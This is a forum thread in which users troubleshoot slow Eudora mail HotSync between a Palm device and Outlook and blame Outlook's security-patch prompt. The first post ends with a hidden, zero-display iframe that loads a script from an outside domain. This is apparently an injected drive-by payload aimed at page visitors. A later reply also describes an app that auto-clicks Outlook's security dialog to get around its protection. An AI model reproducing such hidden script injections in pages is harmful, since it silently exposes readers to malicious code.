+ Reply to Thread

Eudora mail hotsync problem

My phone sync's perfectly with Outlook including all contacts. However, when the Eudora mail syncs to delete any e-mails deleted on the phone, it tries to sync all my e-mail addresses from outook (I have over 1,000) and it takes 15 minutes each times I sync. This seems to be a redundant sync and it is very time consuming. Anyone know how to change the eudora mail sync so it does not sync with e-mail addresses?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Eudora doesn't do that, it is independant of the address book (contacts in Outlook).

Check your Outlook Contacts conduit in the hotsync manager. It may be set to overwrite the Palm everytime.

Thanks for the reply. Let me clarify. When I hotsync, the message reads that it is synchronizing Euroda Mail and asks for time from 1 to 10 minutes to sync. I have to approve the 10 minute sync three times in order to sync. If I cancel, it syncs outlook (contacts, tasks, etc) only. All I need Eurdora to sync is the deleted e-mails from the phone. Do you have any idea what is doing and why it would have to update over 3,000 messages to Eurdora?
    Trip

Originally posted by Twheeler
    When I hotsync, the message reads that it is synchronizing Euroda Mail and asks for time from 1 to 10 minutes to sync.
    I think this is a different "problem." You probably have Outlook with the security patch installed. The security patch is an annoying PITA - basically it forces up that dialog anytime any application tries to access your address book or send an email from your default mail account. (Actually, if you're a special microsoft vendor, they will give you code/libraries that let you avoid creating this dialog in your app.) Oh, it will also prevent you from EVER receiving an executible file as an attachment, even if it's from a trusted source. Nice!

This is generally a good thing, because it shuts down viruses and trojans which replicate via your address book, but it completely sucks that you can't turn it off, or have a list of allowable applications.

Once you have the security patch installed it's practically impossible to remove it, too, at least under Win2000 with Outlook 2000. In the end, I ended up installing a little SysTray app that does nothing but wait for that dialog to pop up, then automatically click the OK button for it. It circumvents the "virus protection", but I'm OK with that since I have NAV for virus protection anyway.

anyhoo, here is the program I use.

All I need Eurdora to sync is the deleted e-mails from the phone. Do you have any idea what is doing and why it would have to update over 3,000 messages to Eurdora? [/B]
    I can't answer this. I had some weird problems with my email sync as well, but it was complicated by the fact that i sync to Outlook with eudora, and also sync a separate mail db to Notes via intellisync, and my notes mailbox was enormous (1000+ emails). Once I fix that issue, I plan to re-enable the mail syncs and figure out what is going wrong.

Yes, Outlook XP has security that is causing this. This prevents external applications from accessing Outlook to do malicious things like mass emailing everyone in your contacts.

IF Eudora would access Outlook via MAPI like the Palm Mail conduit, it wouldn't do this. I use the Palm mail 3.04 Conduit for offline reading of my inbox, and Snapper mail for online reading. Once Snapper Mail has conduits, I will be done with the Palm Mail application.

The fact that you have to approve Eudora's access to Outlook is why I booted it.